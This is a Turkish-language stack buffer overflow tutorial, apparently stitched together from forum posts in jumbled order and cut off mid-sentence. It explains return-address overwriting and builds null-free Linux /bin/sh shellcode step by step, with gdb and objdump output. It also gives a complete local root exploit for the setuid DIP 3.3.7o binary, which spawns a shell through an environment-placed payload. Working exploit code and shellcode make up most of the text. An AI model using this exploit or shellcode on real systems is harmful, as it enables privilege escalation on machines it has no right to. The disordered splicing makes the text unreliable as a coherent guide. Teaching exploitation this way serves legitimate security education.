DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open
/var/lock/LCK..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
No such file or directory
[mnml@victim mnml]$ /usr/sbin/dip -k -l `perl -e ’print "A"x117’`
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open
/var/lock/LCK..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
No such file or directory
Segmentation fault (core dumped)
[mnml@victim mnml]$
Yukarida gordugunuz gibi, dip’in -l switch’ine 116’dan fazla deger
girdiginizde (mesela 117) return adresi override etmis oluyorsunuz :)
Bu da stpcpy ’de bufferin kopyalandigi yerden sonra 117. byte da
RET basliyor demek.
Simdi exploit:
/* /usr/sbin/dip | euid = 0 | mnml@r00t.us */
#include
#include
#include
#define BUFSIZE 250
char sc[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
void main()
{
char *env[2] = {sc, NULL};
char buf[BUFSIZE] = "A";
int i;
int *ap = (int *)(buf + strlen(buf));
int ret = 0xbffffffa - strlen(sc) - strlen("/usr/sbin/dip");
for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
execle("/usr/sbin/dip", "dip", "-k", "-l", buf, NULL, env);
}
Simdi exploitimizi aciklayalim:
BUFFER buyuklugunu 250 byte olarak belirliyoruz, ki 117’den fazla hersey olur
burda. (Fakat bu, her bir exploit icin gecerli degil. Detaylar bir sonraki
dokumanda.)
shell kodumuzu yaziyoruz, ve simdi de main():
shell kodumuzun adresini sakliyacagimiz 2 birimlik bir environment pointer
atiyoruz. Bunun birinci elemaninda shell kodun adresini, digerine de NULL
atiyoruz (execve() boyle istiyor):
char *env[2] = {sc, NULL};
Sonra buffer’imiz icin yer ariyoruz. Bu buffer’i -l switch’ine paremetre
verecegiz. Burda bir tek A koymamiz, ALIGNMENT icin. Hafiza cogumuzun
kullandigi 32 bit islemcilerde 4 byte’lik bolmeler halinde adreslenir.
Dolayisiyla RET’in baslama ve bitimi arasinda 4 byte var. Bizim buffer’imiz
117 byte’dan sonra override ediyor RET’i. 117 4’un kati degil. ona en yakin ve
ondan kucuk 116 var. 1 eksik. O zaman buffer’a bir adet A yazalim ve de dorder
dorder ilerleyerek RET’i shell kodun adresi ile override edelim:
char buf[BUFSIZE] = "A";
Adres pointer’imiz buffer’in A’dan sonraki ilk bolumune isaret ediyor:
int *ap = (int *)(buf + strlen(buf));
RET adresimizi kesin hesapliyoruz, detaylari icin yukariya bakin.
int ret = 0XBFFFFFFA - strlen(sc) - strlen("/usr/sbin/dip");
Dorder dorder ilerleyip, ret’in degerini buffer’in icine dolduralim. Burada
neden *ap’nin degerini 4 artirmiyoruz derseniz, zaten ap bir pointer onun
degerini bir artirmak demek, adresin degerini 4 artirmak demektir:
for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
Ve geriye kalan sadece execve. Once vulnerable programin full path’i,
programin ismi, NULL ile biten argumanlar dizisi ve environment pointer’i
execle’ye paremetre olarak veriyoruz:
execle("/usr/sbin/dip", "dip", "-k", "-l", buf, NULL, env);
Word Doc > http://rapidshare.de/files/47752523/bof.rtf.html
Bir degiskeni saklayabilecegi yerden daha fazla bilgiyle doldurmaya calisirsaniz karsiniza windows’larda gpf, *nix’de segmentation fault olarak cikan olay. input olarak girilen bilginin esp stack pointer’ina tekabul eden yerine yine bu inputtaki uygun memory adresi getirilirse makine uzerinde istenilen kodu icra ettirilebilir ki bu hackerlarin en cok basvurduklari yontemdir. bu makine kodu sistemde genellikle bir backdoor acmak icin yazilir, cogu zaman shell code olarak bilinir.Milw0rm,SecurityFocus gibi sitelerde shellc0de bölümlerinde bulunan exploitlerdir.metasploit yazılımıyla derlenip backdoor açmak içinde kullanılırlar.
C dili dizi referansları üzerinde sınır kontrolü yapmıyor ve yerel değişkenler yığıt(stack) üzerinde o anki durum bilgisini oluşturan dönüş adresi ve frame göstericisiyle birlikte tutuluyor. Bu iki durumun birleşmesi yanlış ellerde ciddi hataların oluşmasına sebep olabilir. Öncelikle kütüphane fonksiyonu olan gets() nasıl çalışıyor bir göstermemiz gerekiyor.
Quote: AKINCILAR
char *gets(char *s){
int c;
char *dest = s;
while ((c = getchar()) != ’\\\\\\\\n’ && c != EOF)
*dest++ = c;
*dest++ = ’\\\\\\\\0’; /* Terminate String */
if (c == EOF)
return NULL;
return s; }
Görüldüğü üzere gets fonksiyonu ’\\\\\\\\n’ (yeni satır) veya EOF görene kadar standart inputtan girdiyi alarak s ile gösterilen yere girdiyi kopyalar, sonuna da "null" karakterini koyar. Bu sırada hiç bir sınır kontrolü yapmıyor. Şimdi gets() fonksiyonunu çağıran bergi fonksiyonunu inceleyelim.
Quote: AKINCILAR
void bergi() {
char buf[4];
printf(“3 karakterden uzun bir string girmeyiniz:)”);
gets(buf);
puts(buf); }
Bufferımız 4’lük olduğu için en fazla 4 karakter girebiliriz gibi görünüyor en başta. Ancak gets’in sona eklediği null karakterini de hesaba katarsak en fazla 3 karakter girebiliriz. Peki 3 karakterden fazla karakter girersek ne olacak? İşte bu durumu incelememiz gerekiyor. Yukardan aşağıya doğru adresin azaldığını düşünelim. Öncelikle kullanıcıdan alınan girdinin “123” olduğu durumu değerlendirelim. Yığıtın o anki durumu aşağıdaki gibi olacaktır. (1den 9 a kadar olan sayılar için ascii tablosunda verilen onaltılık tabandaki değerler 0x31 ile 0x39 arasındadır.)
Eğer girdi “1234567” olursa buffer 1234 ile dolacak , frame göstericisi ise 567 ve null karakterleriyle dolacaktır ve yığıt şu halde olacaktır.
Yani buf[4] ’ten buf[7] ’ ye kadar olan tüm yazmalar frame göstericisinin (pointerının) değerini değiştirecektir. bergi fonksiyonun işi bittiğinde ve çağrıldığı fonksiyona dönülmek istendiğinde frame göstericisinin değerleri değiştiği için (az bir ihtimal kullanıcı frame göstericisi %ebp’nin değeri ile aynı değeri verecek karakterleri girseydi sorun olmayacaktı), yanlış bir çerçeve içinde bergi fonksiyonu kaldığı yerden çalışmaya devam edecekti ve fonksiyon içinde kullanılan tüm referanslar geçersiz olacaktı.
Son olarak da “123456789” girildiğini düşünelim. Bu durumda yığıttaki buffer, %ebp ve dönüş adres kısımları ekrandan girilen girdiyle dolacak ve değerleri değişecekti. Yanlış bir çerçeveye geçilecek ve dönüş adresi de değiştiği için bergi fonksiyonunu çağıran fonksiyonda kalındığı yerden devam edilemeyecekti. Yüksek olasılıkla segmentation fault hatası alınacaktı.
Boylece buffer doldu tasti, geri donus adresi de dahil olmak uzere hafizanin
bir kismini ’A’ harfi ile doldurdu. Bu programi derleyip calistirirsak,
"Segmentation fault (core dumped)" hatasi aliriz. Bu hatanin sebebi
genellikle programin kendine ait bellek kismi disindaki kisimlara erismeye
calismasidir. Core dosyasini, programin crash ettigi andaki hafiza
fotografi olarak dusunebiliriz.
gdb ile olusan core dosyasini incelersek:
[evil@victim evil]$ gdb -q ./e ./core
Core was generated by `./e’
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
Gordugunuz gibi, RET instruction’i EIP register’ina ’AAAA’ ya karsilik gelen
0x41414141 adresini PUSH ettigi icin, bu adresteki instruction’a islemci
tarafindan erisilmeye calisilmis. Fakat bu adres prosesin erisim yetkisi
disinda oldugu icin isletim sistemi SIGSEGV signaliyla programin calismasina
son vermis.
fonksiyon’u cagirdigimizda Stack’in gorunumu soyledir:
| *str | EBP+8
|geri donus adresi| EBP+4
| saklanmis ESP | EBP ESP
| foo1 | EBP-4
| foo1 | EBP-8
| foo1 | EBP-12
| foo1 | EBP-16
Biz strcpy()’yi cagirdigimizda buyuk_array, foo1 array’inin baslangic adresi
olan EBP-16’dan baslayarak, yukari dogru butun stack’i A ile dolduruyor.
Simdi, peki, geri donus adresinin uzerine yazabildik, o zaman o adrese
calismasini istedigimiz baska bir program parcaciginin adresini koysak,
fonksiyon geri dondugunde o program parcaciginin adresine gidip, ordaki
instruction’lari calistirmaya baslamaz mi?
Cevap: Evet baslar. Mesela biz buraya /bin/sh calistiran bir kodun adresini
koysak, fonksiyon geri dondukten sonra /bin/sh calistiracak olan kod
calismaya baslayacak ve biz shell’e dusecegiz.
Pointer aritmetigi ile, geri donus adresinin degerini degistiebildigimizi
soyle ufak bir ornekte anlatmaya calisalim:
void fonksiyon(int a, int b, int c)
{
char foo[6];
int *ret;
ret = foo + 12;
(*ret) += 8;
}
void main()
{
int x;
x = 0;
fonksiyon(1, 2, 3);
x = 1;
printf("%d\\\\\\\\n", x);
}
Yukaridaki kodu calistirisaniz, x degerinin 1 olarak degil 0 olarak
basildigini goreceksiniz. Burada yaptigimiz sey, geri donus adresinin degeri
ile oynayarak, x = 1; komutunu pas gecmek oldu.
Yukaridaki kodda daha once de anlattigimiz gibi, fonksiyon cagrilmadan once,
bir sonraki instruction’un yani "x = 1"e denk gelen instruction’in adresi
geri donus adresi olarak stack’e PUSH ediliyor. Fonksiyon cagrildiktan sonra
stack’in gorunumunu sembolize edecek olursak:
| a | EBP+16
| b | EBP+12
| c | EBP+8
|geri donus adresi| EBP+4
| saklanmis ESP | EBP ESP
| foo | EBP-4
| foo | EBP-8
fonksiyon icinde bir integer’a pointer olan *ret, in adresini, foo’nun adresi
+ 12 olarak belirledik. Yukaridaki sekle bakarsaniz, foo’nun
adresi(ESP-8)’e 12 eklerseniz geri donus adresinin basina gelmis oluruz.
(*ret) += 8 yaparak da, o bolmede saklanmakta olan geri donus adresinin
degerini 8 aritiriyoruz. Neden mi? Kodumuzun assembler dump’ina bakalim:
0x804849d : pushl $0x3
0x804849f : pushl $0x2
0x80484a1 : pushl $0x1
0x80484a3 : call 0x8048470
0x80484a8 : addl $0xc,%esp
0x80484ab : movl $0x1,0xfffffffc(%ebp)
0x80484b2 : movl 0xfffffffc(%ebp),%eax
0x80484b5 : pushl %eax
0x80484b6 : pushl $0x804851c
0x80484bb : call 0x80483bc
0x80484c0 : addl $0x8,%esp
0x80484c3 : leave
0x80484c4 : ret
daki fonksiyon’a CALL yapilmadan once ne yapiliyordu? Bir sonraki
instruction’un adresi stack’a push ediliyordu. Yani stack’e diger
instruction’un adresi olarak (x = 1’in) 0x80484ab adresi PUSH edilecek. Fakat
biz burdaki instruction’u gecmek ve de direkt olarak 0x80484b2 adresinden
devam etmek istiyoruz. Aradaki fark da 0x80484b2 - 0x80484ab = 0x8.
Yani 8 byte’lik bir fark var. O zaman, stack’a PUSH edilen geri donus
adresini degerini 8 artirirsak, x = 1 islemini bypass etmis olacagiz. Iste
bu nedenle 8 byte artiriyoruz: (*ret) += 8;.
Evet, eger retun adresin degeri ile oynayip, onu istedigimiz bir hafiza
bolmesine yonlendirebiliyorsak, o zaman, hafizada shell spawn eden bir
instruction’lar dizisi bulundurur, geri donus adresini de bu instruction’lar
dizisinin baslangic adresi olarak degistiririz, ve voila, direk olarak
shell’e duseriz!!!
Peki o zaman, shell spawn etmek icin ne yapmali? En basitinden C’de soyle
olacaktir:
#include
void main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
execve(2)’yi okursaniz, execve system call’u calistirilacak dosya ismine
pointer, arguman pointer’i ve de NULL da olabilen bir environment pointer’i
aliyor. Bu kodu derleyip calistirirsaniz:
[MnmL@victim MnmL]$ ./s
bash$
baska bir shell spawn etmis olursunuz...
Fakat biz "shell spawn eden programimizi" boyle cagiramayiz, oyle degil mi?
O zaman bunu makinanin direkt calistirabilecegi instruction’lar dizisi haline
getirmek lazim. Yukaridaki kodumuzu gcc’ye --static parametresi vererek
derleyip, assembler ciktisina bakalim:
[MnmL@victim MnmL]$ gcc --static -o s s.c
[MnmL@victim MnmL]$ gdb ./s
(gdb) disas main
Dump of assembler code for function main:
0x8048124 : pushl %ebp
0x8048125 : movl %esp,%ebp
0x8048127 : subl $0x8,%esp
0x804812a : movl $0x80592ac,0xfffffff8(%ebp)
0x8048131 : movl $0x0,0xfffffffc(%ebp)
0x8048138 : pushl $0x0
0x804813a : leal 0xfffffff8(%ebp),%eax
0x804813d : pushl %eax
0x804813e : movl 0xfffffff8(%ebp),%eax
0x8048141 : pushl %eax
0x8048142 : call 0x804ca10
0x8048147 : addl $0xc,%esp
0x804814a : leave
0x804814b : ret
0x804814c : nop
0x804814d : nop
0x804814e : nop
0x804814f : nop
End of assembler dump.
(gdb)
Yukarida kisaca, ve de procedure prologue goruluyor,
-- char *shell icin gerekli 8 byte stack pointer’dan cikiliyor,
-- "/bin/sh" string’inin adresi EBP - 8’e yani shell[0]’a konuyor
- 0x0 yani NULL EBP - 4’e konuyor
simdi de sirasiyla argumanlar bir sonraki fonksiyon (execve) icin stack’a
PUSH ediliyor...
- 0x0 (shell[1]) PUSH ediliyor
- shell[0]’daki "/bin/sh" in adresi EAX registirina konuyor
- EAX stack’a push ediliyor, (dolayisiyla shell[0]in icindeki
efektiv adres)
- shell[0] in adresi EAX’a kopyalaniyor,
- EAX gene PUSH ediliyor
- execve() cagriliyor...
Simdi de execve’nin assembler dump’ina bakalim:
(gdb) disas __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.
Ilk uc satir, procedure prologue:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
Syscall table’daki execve’nin numarasi olan 11’i EAX’a kopyaliyoruz.
(farkli system call calistirmak isteyebilirsiniz, system call’un numarasini
/usr/src/linux/include/asm/unistd.h dosyasindan ogrenebilirsiniz. Farkli
system call’lari kullanan daha egzotik shellcode’lari sonraki dokumanlarda
bulabileceksiniz)
0x80002c0 <__execve+4>: movl $0xb,%eax
"/bin/sh" in adresini EBX’e kopyaliyoruz:
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
shell[]’in adresini ECX’e kopyaliyoruz:
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
NULL pointer’in adresini EDX’e kopyaliyoruz:
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
ve, kernel mod’a geciyoruz:
0x80002ce <__execve+18>: int $0x80
Simdi de, exit() icin gerekli assebmly kodlari:
(gdb) disas _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
Yukadida da, ozet olarak, EAX register’i syscall table’da exit’in karsiligi
olan 1 yapilip, EBX’de 0 yapilip kernel mode’a geciliyor.
Evet yukaridakileri soyle bir ozetlersek, yaptigimiz sey, stack’a shell[0],
shell ve NULL PUSH edip execve’yi cagirmakti. Sonra execve "/bin/sh"i
calistirdi. Yalniz dikkat ediniz, execve’nin icinde yapilan isler tamamen
Linux-specific’tir. Linux, kernel moduna gecmeden once gerekli olan seyleri
register’lara koyar ve sonra da kernel moduna gecer, eger isletim sistemimiz
FreeBSD olsa idi, execve bu parametreleri gene stack’a koyacakti...
execve’nin calismasi icin gereken sartlar:
1. Hafizanin bir yerinde "/bin/sh" stringini bulundurmak,
2. "/bin/sh" in adresini ve arkasindan bir adet null long word bulundurmak
3. system call table’da execve’yi tanimlayan 0xb (11) degerini EAX registerina
koymak
4. "/bin/sh" in adresinin adresini EBX registerina koymak
5. shell’in adresini ECX registerina koymak
6. null long word’un adresini EDX registerina koymak,
7. 0x80 ile kernel moda gecmek.
Iste bu kadar, yalniz execve’de bir sorun oldugunda programin smooth exit
yapabilmesi icin bir de buna exit() system call’unu eklemeliyiz, ama bu
zorunlu degil. Bunu yapmayip shellcode’unuzu kisaltabilirsiniz.
exit() calistiran bir programi assembler koduna baktiginiz zaman, exit
syscall’unun da kernel moda gecmeden evvel, EAX registerina 0x1 (1) ve
de, EBX registerina 0x0 (0) istedigini goreceksiniz.
O zaman 7. den sonra 8, 9 ve 10. adimlarimizi da yazalim:
8. system call table’da exit’in karsiligi olan 0x1’i EAX’a koy
9. EBX’e 0x0 koy
10 0x80 ile kernel moduna gec.
Evet, kisaca boyle. Bu isleri yapan bir shell code yazip, objdump’la
hex karsiligini bulabiliriz:
void main() {
__asm__("
jmp 0x2a # 3 byte
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 byte
movb $0x0,0x7(%esi) # 4 byte
movl $0x0,0xc(%esi) # 7 byte
movl $0xb,%eax # 5 byte
movl %esi,%ebx # 2 byte
leal 0x8(%esi),%ecx # 3 byte
leal 0xc(%esi),%edx # 3 byte
int $0x80 # 2 byte
movl $0x1, %eax # 5 byte
movl $0x0, %ebx # 5 byte
int $0x80 # 2 byte
call -0x2f # 5 byte
.string \\\\\\\\"/bin/sh\\\\\\\\" # 8 byte
");
}
Bu programi derleyip objdump’la sadece main’in icerigine bakalim:
[mnml@victim mnml]$ make q
cc q.c -o q
[mnml@victim mnml]$ objdump -d q | grep \\\\\\\\: -A23 | more
08048440 :
8048440: 55 pushl %ebp
8048441: 89 e5 movl %esp,%ebp
8048443: eb 2a jmp 804846f
8048445: 5e popl %esi
8048446: 89 76 08 movl %esi,0x8(%esi)
8048449: c6 46 07 00 movb $0x0,0x7(%esi)
804844d: c7 46 0c 00 00 movl $0x0,0xc(%esi)
8048452: 00 00
8048454: b8 0b 00 00 00 movl $0xb,%eax
8048459: 89 f3 movl %esi,%ebx
804845b: 8d 4e 08 leal 0x8(%esi),%ecx
804845e: 8d 56 0c leal 0xc(%esi),%edx
8048461: cd 80 int $0x80
8048463: b8 01 00 00 00 movl $0x1,%eax
8048468: bb 00 00 00 00 movl $0x0,%ebx
804846d: cd 80 int $0x80
804846f: e8 d1 ff ff ff call 8048445
8048474: 2f das
8048475: 62 69 6e boundl 0x6e(%ecx),%ebp
8048478: 2f das
8048479: 73 68 jae 80484e3 <_etext+0x33>
804847b: 00 c9 addb %cl,%cl
804847d: c3 ret
Gordugunuz gibi bize gerekli instruction’lar 0x8048443’ten itibaren basliyor.
Dikkat ederseniz, instruction’lar arasinda ornegin movl $0xb,%eax’a denk
gelen 0 iceren bir kac byte vardir. Sorun su ki, strcpy() ve arkadaslari
0 byte’i string’in sonu olarak algiliyor, yani bu haliyle bizim shellcode
sadece ilk 0 byte’a kadar kopyalanacak. 0’lara denk gelen instruction’lari
bunlarin dengi fakat 0 icermeyen instruction’larla degistirip tekrar
deneyelim. Asagida, hangi instruction’lari hangileriyle degistirdigimiz
yeraliyor:
movb $0x0,0x7(%esi) xorl %eax,%eax
molv $0x0,0xc(%esi) movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
--------------------------------------------------------
movl $0xb,%eax movb $0xb,%al
--------------------------------------------------------
movl $0x1, %eax xorl %ebx,%ebx
movl $0x0, %ebx movl %ebx,%eax
inc %eax
Ve yeni shellcode’umuz:
void main() {
__asm__("
jmp 0x1f # 2 byte
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 byte
xorl %eax,%eax # 2 byte
movb %eax,0x7(%esi) # 3 byte
movl %eax,0xc(%esi) # 3 byte
movb $0xb,%al # 2 byte
movl %esi,%ebx # 2 byte
leal 0x8(%esi),%ecx # 3 byte
leal 0xc(%esi),%edx # 3 byte
int $0x80 # 2 byte
xorl %ebx,%ebx # 2 byte
movl %ebx,%eax # 2 byte
inc %eax # 1 byte
int $0x80 # 2 byte
call -0x24 # 5 byte
.string \\\\\\\\"/bin/sh\\\\\\\\" # 8 byte
# toplam 46 byte
");
}
[mnml@victim mnml]$ make q
cc q.c -o q
[mnml@victim mnml]$ objdump -d q | grep \\\\\\\\: -A23
08048440 :
8048440: 55 pushl %ebp
8048441: 89 e5 movl %esp,%ebp
8048443: eb 1f jmp 8048464
8048445: 5e popl %esi
8048446: 89 76 08 movl %esi,0x8(%esi)
8048449: 31 c0 xorl %eax,%eax
804844b: 88 46 07 movb %al,0x7(%esi)
804844e: 89 46 0c movl %eax,0xc(%esi)
8048451: b0 0b movb $0xb,%al
8048453: 89 f3 movl %esi,%ebx
8048455: 8d 4e 08 leal 0x8(%esi),%ecx
8048458: 8d 56 0c leal 0xc(%esi),%edx
804845b: cd 80 int $0x80
804845d: 31 db xorl %ebx,%ebx
804845f: 89 d8 movl %ebx,%eax
8048461: 40 incl %eax
8048462: cd 80 int $0x80
8048464: e8 dc ff ff ff call 8048445
8048469: 2f das
804846a: 62 69 6e boundl 0x6e(%ecx),%ebp
804846d: 2f das
804846e: 73 68 jae 80484d8 <_fini+0x28>
8048470: 00 c9 addb %cl,%cl
Shell kodumuzu deneyelim:
char shellcode[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = shellcode;
}
[mnml@victim mnml]$ make shellcode
cc shellcode.c -o shellcode
[mnml@victim mnml]$ ./shellcode
bash$
Iste calisti!
Yaptigimiz sey, main() icindeki pointer to integer olan ret degiskeninin
adresini 2 birim (8 byte) artirarak geri donus adresinin oldugu yere gitmek,
sonra da o bolume shellcode’umuzun adresini saklamakti. main RET yaptiginda
geri donus adresi yerine shell kodumuzun adresini POP edildi, ve islemci
bu adresteki instruction’lari calistirdi...
-- Exploit Yazma --
Simdi kendimiz bir buffer overflow hatasi olan bir kod yazip, ondan shell
calistiralim:
victim.c:
char shellcode[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
char large_str[50];
void main()
{
int i;
char foo[12];
int *ap = (int *)large_str;
for (i = 0; i < 50; i += 4)
*ap++ = shellcode;
strcpy(foo, large_str);
}
[mnml@victim mnml]$ make victim
cc victim.c -o victim
[mnml@victim mnml]$ ./victim
bash$
Voila! Iste bu kadar. Peki ne yaptik? for dongusunde, large_str array’ine
shellcode’umuz olan shellcode’nin adresini kopyaladik. Adres 32 bit - 4 byte
oldugu icin, i degiskenini 4’er artiriyoruz. Daha sonra, main()’in icindeki
12 bytelik array’e, shellcode’umuzun adresini barindiran 50 bytelik bir array
kopyalayinca (strcpy()), geri donus adresinin uzerine large_str’nin icerigi --
bizim shellcode’un adresi -- yazildi. Ve dolayisiyla main() cagrilmadan
once save edilen geri donus adresi, shell kodumuzun adresi ile override
edildi. Boylece main()’deki RET shellcode’un adresini POP ediyor ve islemci
o adresteki instruction’lari calistirip bize shell prompt veriyor. Burda
karistirilmamasi gereken bir nokta, strcpy()’nin kendi buffer’ini degil,
main()’in buffer’ini overflow etmesi. Yani strcpy() CALL edilirken, ondan
sonraki instruction’in adresi strcpy() RET ettikten sonra da eskisi gibi
duruyor. strcpy()’nin overwrite ettigi main()’in local degiskeni olan foo.
Evet, simdi burada kendi programimizin buffer’ini overflow ettik,
shellcode’umuzun adresin biliyorduk. Peki baska bir programin buffer’ini
overflow ederken napicaz? Shellkodumuzun hafizanin neresinde olacagini
nereden bilecegiz? Guzel bi soru.
Iki cevabi var:
1. Aleph1’in paper’inda yazdigi gibi, aslinda bilemeyiz, isletim sistemi o
kodu bi yerlere atar, biz de shell kod’un offset’ini tahmin edebiliriz. Ama
bu su anda cok "lame" kabul edilen bir yontem.
2. Akillilik edip, shell kodun adresini biz kendimiz belirleyebiliriz.
Nasil mi?
Linux ELF binary’si hafizaya yuklendigindeki hafiza haritasinin en yuksek
adresine gdb ile detayli gozatarsak sunu goruruz:
--------------------- 0xBFFFFFFF
|\\\\\\\\000 \\\\\\\\000 \\\\\\\\000 \\\\\\\\000| 0xBFFFFFFB (4 tane NUL byte)
|\\\\\\\\000 ...... | 0xBFFFFFFA (program_ismi)
| ..................|
|...................| 1. environment degiskeni (env[0])
|...................| 2. environment degiskeni (env[1])
|...................| 3. ...
|...................| ...
|...................| 1. argument string’i (argv[0])
|...................| 2. argument string’i (argv[1])
|...................| 3. ...
| . |
| . |
| . |
Daha once execve() nin son parametresinin environment degiskenlerini tutan
bir string’ler array’i oldugunu soylemistik. Buraya kadar guzel, yukaridaki
sekle bakarsaniz, biz, 1. enviroment degiskeninin *baslangic* adresini kesin
olarak hesapliyabiliriz.
envp = 0xBFFFFFFF -
4 - (4 tane NUL byte)
strlen(program_ismi) - (program isminin son NUL’i icermeyen boyutu)
1 - (yukarida strlen()’in saymadigi NUL)
strlen(envp[0]) (ilk environment degiskenin boyutu)
Daha da basitlestirirsek:
envp = 0xBFFFFFFA - strlen(program_ismi) - strlen(env[0])
O zaman envp[0]’a shellcode’umuzu koyup, envp’yi execve’ye environment
degiskenlerini barindiran array of strings parametresi olarak verebiliriz.
Boylece shellcode’umuzun adresini kesin bildigimize gore, overflow
edecegimiz buffer’i hangi adresle doldurmamiz gerektigini biliyoruz:
ret = 0xBFFFFFFA - strlen(program_ismi) - strlen(shellcode);
Buffer overflow ne demek biliyoruz, bufferi nasil overflow edecegimizi
biliyoruz, return adresi nasil modifiye edebilecegimizi biliyoruz,
shellcode’umuzun adresini de biliyoruz, sorun kalmadi, simdi ilk gercek
exploit’umuzu yazabiliriz:
- The Exploit -
DIP (Dial Up IP protocol) programinin 3.3.7o-uri (8 Feb 96) versiyonunda,
bir buffer overflow hatasi vardi. Bu program bazi Linux dagitimlarinda
by-default setuid olarak geliyordu. Programin aldigi parametrelerden -l
switch’i, programin icinde manipulate edilirken stpcpy() fonksiyonu ile
bounds checking yapilmadan kopyalaniyordu. Dolayisiyla burada bir buffer
overflow olusuyordu.
DIP’in bu versiyonunda hatali olan kod asagidaki gibiydi:
command.c dosyasinda, asagidaki gibi bi operasyon var:
l = stpcpy(l, argv);
Man stpcpy deyip bakarsaniz stpcpy fonksiyonu buffer’in sinirlari hakkinda
hicbir kontrol uygulamadan kendisine verilen string’i digerine oylece
